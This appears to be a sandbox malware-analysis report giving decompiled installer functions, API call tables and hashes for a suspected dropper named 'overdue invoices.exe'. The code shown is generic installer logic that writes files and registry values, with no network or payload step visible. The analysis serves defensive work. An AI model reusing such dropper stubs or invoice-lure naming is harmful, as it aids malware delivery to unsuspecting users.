                  • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                  • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                  • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                  • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                  0x00405ce5
                  0x00405ced
                  0x00405d01
                  0x00405d01
                  0x00405d07
                  0x00405d14
                  0x00405d14
                  0x00405d15
                  0x00405d17
                  0x00405d1b
                  0x00405d1d
                  0x00405d26
                  0x00405d28
                  0x00405d42
                  0x00405d4a
                  0x00405d4a
                  0x00405d4f
                  0x00405d51
                  0x00405d53
                  0x00405d57
                  0x00405d58
                  0x00405d5b
                  0x00405d63
                  0x00405d65
                  0x00405d69
                  0x00000000
                  0x00000000
                  0x00405d6f
                  0x00405d74
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405d74
                  0x00405d79

                  APIs
                  • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Char$Next$Prev
                  • String ID: "C:\Users\user\Desktop\overdue invoices.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 589700163-1946179686
                  • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                  • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                  • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                  • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                  0x00403eb0
                  0x00403f44
                  0x00000000
                  0x00403f44
                  0x00403ec1
                  0x00403ec5
                  0x00000000
                  0x00000000
                  0x00403ecb
                  0x00403ed4
                  0x00403ed7
                  0x00403ed7
                  0x00403edd
                  0x00403ee3
                  0x00403ee3
                  0x00403eef
                  0x00403ef5
                  0x00403efc
                  0x00403eff
                  0x00403f02
                  0x00403f04
                  0x00403f04
                  0x00403f0c
                  0x00403f12
                  0x00403f12
                  0x00403f1c
                  0x00403f21
                  0x00403f24
                  0x00403f29
                  0x00403f2c
                  0x00403f2c
                  0x00403f3c
                  0x00403f3c
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                  • String ID:
                  • API String ID: 2320649405-0
                  • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                  • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                  • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                  • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0x7e00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                  0x0040266e
                  0x00402670
                  0x0040267c
                  0x0040267f
                  0x00402689
                  0x0040268d
                  0x0040268d
                  0x00402693
                  0x004026a0
                  0x004026a8
                  0x004026ab
                  0x004026b1
                  0x004026bf
                  0x004026c4
                  0x004026c8
                  0x004026cb
                  0x004026d4
                  0x004026e0
                  0x004026e4
                  0x004026e7
                  0x004026f1
                  0x00402710
                  0x004026f8
                  0x004026fd
                  0x00402705
                  0x00402708
                  0x0040270d
                  0x0040270d
                  0x00402717
                  0x00402717
                  0x00402729
                  0x00402730
                  0x00402742
                  0x00402742
                  0x00402748
                  0x00402748
                  0x00402753
                  0x00402754
                  0x00402758
                  0x0040275c
                  0x00402762
                  0x00402762
                  0x00402769
                  0x00402156
                  0x00402880
                  0x0040288c

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                  • GlobalFree.KERNEL32 ref: 00402717
                  • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                  • GlobalFree.KERNEL32 ref: 00402730
                  • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                  • String ID:
                  • API String ID: 3294113728-0
                  • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                  • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                  • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                  • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                  0x00404e29
                  0x00404e35
                  0x00404e38
                  0x00404e3e
                  0x00404e4a
                  0x00404e4d
                  0x00404e50
                  0x00404e56
                  0x00404e56
                  0x00404e5c
                  0x00404e64
                  0x00404e67
                  0x00404e84
                  0x00404e88
                  0x00404e91
                  0x00404e91
                  0x00404e9b
                  0x00404ea4
                  0x00404eb0
                  0x00404eb7
                  0x00404ebb
                  0x00404ebe
                  0x00404ed1
                  0x00404edf
                  0x00404edf
                  0x00404ee3
                  0x00404ee5
                  0x00404ee8
                  0x00000000
                  0x00404ee8
                  0x00404e69
                  0x00404e71
                  0x00404e79
                  0x00404e7f
                  0x00000000
                  0x00404e7f
                  0x00404e79
                  0x00404e67
                  0x00404ef2

                  APIs
                  • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                  • String ID:
                  • API String ID: 2531174081-0
                  • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                  • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                  • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                  • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                  0x00404700
                  0x0040470d
                  0x00404713
                  0x00404751
                  0x00404751
                  0x00404760
                  0x00404767
                  0x00000000
                  0x00404769
                  0x00404715
                  0x00404724
                  0x0040472c
                  0x0040472f
                  0x00404741
                  0x00404747
                  0x0040474e
                  0x00000000
                  0x0040474e
                  0x00000000

                  APIs
                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                  • GetMessagePos.USER32 ref: 00404715
                  • ScreenToClient.USER32 ref: 0040472F
                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Message$Send$ClientScreen
                  • String ID: f
                  • API String ID: 41195575-1993550816
                  • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                  • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                  • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                  • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402B2D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                  0x00402b3a
                  0x00402b48
                  0x00402b4e
                  0x00402b4e
                  0x00402b5c
                  0x00402b5e
                  0x00402b6a
                  0x00402b6f
                  0x00402b71
                  0x00402b71
                  0x00402b7c
                  0x00402b8c
                  0x00402b9e
                  0x00402b9e
                  0x00402ba6

                  APIs
                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                  • wsprintfA.USER32 ref: 00402B7C
                  • SetWindowTextA.USER32(?,?), ref: 00402B8C
                  • SetDlgItemTextA.USER32 ref: 00402B9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Text$ItemTimerWindowwsprintf
                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                  • API String ID: 1451636040-1158693248
                  • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                  • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                  • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                  • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004022F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}











                  0x004022f6
                  0x004022fb
                  0x00402305
                  0x0040230f
                  0x00402312
                  0x0040231c
                  0x00402322
                  0x0040232c
                  0x00402333
                  0x0040233b
                  0x00402349
                  0x0040234d
                  0x00402358
                  0x00402358
                  0x0040235c
                  0x00402360
                  0x00402366
                  0x0040236b
                  0x0040236b
                  0x0040236f
                  0x0040237b
                  0x0040237b
                  0x00402394
                  0x00402396
                  0x00402396
                  0x00402399
                  0x0040246f
                  0x0040246f
                  0x00402880
                  0x0040288c

                  APIs
                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz4671.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz4671.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz4671.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CloseCreateValuelstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\nsz4671.tmp
                  • API String ID: 1356686001-2009420083
                  • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                  • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                  • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                  • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                  0x00402bd1
                  0x00402bd3
                  0x00402bda
                  0x00402bdd
                  0x00402bdd
                  0x00402be3
                  0x00000000
                  0x00402be3
                  0x00402beb
                  0x00402bf1
                  0x00000000
                  0x00402bf4
                  0x00402bfb
                  0x00402c01
                  0x00402c07
                  0x00402c09
                  0x00402c0f
                  0x00402c4d
                  0x00402c53
                  0x00000000
                  0x00402c53
                  0x00402c11
                  0x00402c18
                  0x00402c29
                  0x00000000
                  0x00402c37
                  0x00402c18
                  0x00402c5a

                  APIs
                  • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                  • GetTickCount.KERNEL32 ref: 00402BFB
